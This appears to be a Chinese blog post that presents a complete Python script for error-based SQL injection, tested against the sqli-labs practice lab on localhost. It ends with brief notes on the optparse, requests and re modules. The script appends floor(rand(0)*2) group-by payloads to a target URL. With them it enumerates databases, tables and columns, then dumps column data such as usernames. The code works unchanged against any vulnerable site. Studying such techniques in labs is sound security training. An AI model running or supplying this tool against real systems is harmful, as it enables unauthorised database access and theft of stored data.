python脚本sql报错查询

2018-06-08  本文已影响0人  sky枫

这里我用的是sqli-labs-master来做的实验

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from optparse import OptionParser
import sys
import requests
import re

parser=OptionParser()

parser.add_option("-d", "--database",action="store",type="string",dest="database",help="Please input test database")
parser.add_option("-t", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-c", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-u", "--url",action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

#print(options)
#print(args)
def main():
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database == None and options.table == None and options.column == None:
        getAllDatabases(options.url)
    elif options.url != None and options.database != None and options.table == None and options.column == None:
        getAllTables(options.url,options.database)
    elif options.url != None and options.database != None and options.table !=None and options.column == None:
        getAllColumnByTable(options.url,options.table,options.database)
    elif options.url != None and options.database != None and options.table != None and options.column != None:
        getAllContent(options.url,options.column,options.table,options.database)

def http_get(url):
    result = requests.get(url)
    return result.content

def getAllDatabases(url):
    db_nums_payload =url + " and (select 1 from (select count(*),concat((select concat(0x7e,count(schema_name),0x7e) from information_schema.schemata),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    html = http_get(db_nums_payload)
    result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)
    db_nums = int(result.group(1))
    print("数据库的个数为:%d" % db_nums)
    for x in range(db_nums):
        db_name_payload = url + " and (select 1 from (select count(*),concat((select concat(0x7e,schema_name,0x7e) from information_schema.schemata limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % x
        html = http_get(db_name_payload)
        result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)
        db_name = result.group(1)
        print("第%d个数据库为:%s" % (x+1,db_name))

def getAllTables(url,database):
    tab_nums_payload = url + " and (select 1 from (select count(*),concat((select concat(0x7e,count(table_name),0x7e) from information_schema.tables where table_schema = '%s'),floor(rand(0)*2))x from information_schema.tables group by x)a)" % database
    html = http_get(tab_nums_payload)
    result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)
    tab_nums = int(result.group(1))
    print("数据表的个数为:%d" % tab_nums)
    for x in range(tab_nums):
        tab_name_payload = url + " and (select 1 from (select count(*),concat((select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema = '%s' limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,x)
        html = http_get(tab_name_payload)
        result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)
        tab_name = result.group(1)
        print("第%d个数据表为:%s" % (x+1,tab_name))

def getAllColumnByTable(url,table,database):
    colu_nums_payload = url + " and (select 1 from (select count(*),concat((select concat(0x7e,count(column_name),0x7e) from information_schema.columns where table_name = '%s' and table_schema = '%s'),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (table,database)
    html = http_get(colu_nums_payload)
    result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)
    colu_nums = int(result.group(1))
    print("字段的个数为:%d" % colu_nums)
    for x in range(colu_nums):
        colu_name_payload = url + " and (select 1 from (select count(*),concat((select concat(0x7e,column_name,0x7e) from information_schema.columns where table_name = '%s' and table_schema = '%s' limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (table,database,x)
        html = http_get(colu_name_payload)
        result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I) #html后要加编码声明
        colu_name = result.group(1)
        print("第%d个字段为:%s" % (x+1,colu_name))

def getAllContent(url,column,table,database):
    con_nums_payload = url + " and (select 1 from (select count(*),concat((select concat(0x7e,count(%s),0x7e) from %s.%s),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (column,database,table)
    html = http_get(con_nums_payload)
    result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)
    con_nums = int(result.group(1))
    print("字段%s中数据的个数为:%d" % (column,con_nums))
    for x in range(con_nums):
        con_name_payload = url + " and (select 1 from (select count(*),concat((select concat(0x7e,(%s),0x7e) from %s.%s limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (column,database,table,x)
        html = http_get(con_name_payload)
        result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)
        con_name = result.group(1)
        print("字段%s的第%d个数据:%s" % (column,x+1,con_name))

if __name__ == '__main__':
  #getAllDatabases('http://127.0.0.1/sqli-labs/Less-2/?id=2')
    #getAllTables('http://127.0.0.1/sqli-labs/Less-2/?id=2','liuyanban')
    #getAllColumnByTable('http://127.0.0.1/sqli-labs/Less-2/?id=2','user','liuyanban')
    #getAllContent('http://127.0.0.1/sqli-labs/Less-2/?id=2','username','user','liuyanban')
    main()

这里用了optparses,requests,re模块 sys模块可有可无。
optparses 模块是传参用的接受url,数据库名,表名,字段名的
requests 模块是url请求是要用到的。
requests 模块请求方法

HTTP请求类型

requests模块接收返回的url值

re 模块是正则表达式模块

result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)
上一篇 下一篇

猜你喜欢

热点阅读